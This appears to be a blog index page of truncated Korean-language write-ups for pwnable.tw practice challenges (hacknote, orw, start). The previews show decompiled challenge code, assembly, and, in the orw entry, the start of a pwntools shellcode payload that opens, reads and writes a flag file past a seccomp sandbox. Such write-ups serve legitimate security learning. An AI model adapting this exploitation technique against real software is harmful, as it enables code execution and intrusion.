Write-ups/pwnable.tw
-
hacknote - pwnable.twWrite-ups/pwnable.tw 2020. 2. 13. 18:31
Prob Info void __cdecl __noreturn main() { int v0; // eax char buf; // [esp+8h] [ebp-10h] unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); while ( 1 ) { while ( 1 ) { menu(); read(0, &buf, 4u); v0 = atoi(&buf); if ( v0 != 2 ) break; delete_note(); } if ( v0 > 2 ) { if ( v0 == 3 ) { print_note(); } else { if ( v0 == 4 ) exit(0); L..
-
orw - pwnable.twWrite-ups/pwnable.tw 2020. 2. 13. 16:44
Prob Info int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); ((void (*)(void))shellcode)(); return 0; } orw_seccomp로 샌드박싱을 해줘서 open read write로 플래그를 읽으면 된다. 대충 폰툴을 이용해서 쉘코드를 짜면 편하다. shellcode = shellcraft.open('/home/orw/flag') shellcode += shellcraft.read('eax','esp',100) shellcode += shellcraft.write(..
-
start - pwnable.twWrite-ups/pwnable.tw 2020. 2. 13. 16:17
Prob Info 보호기법이 적용되어있지 않다. 간단하게 쉴코딩 문제로 예상된다. public _start _start proc near push esp push offset _exit xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx push 3A465443h push 20656874h push 20747261h push 74732073h push 2774654Ch mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write xor ebx, ebx mov dl, 3Ch mov al, 3 int 80h ; LINUX - add esp, 14h retn 문제에 메..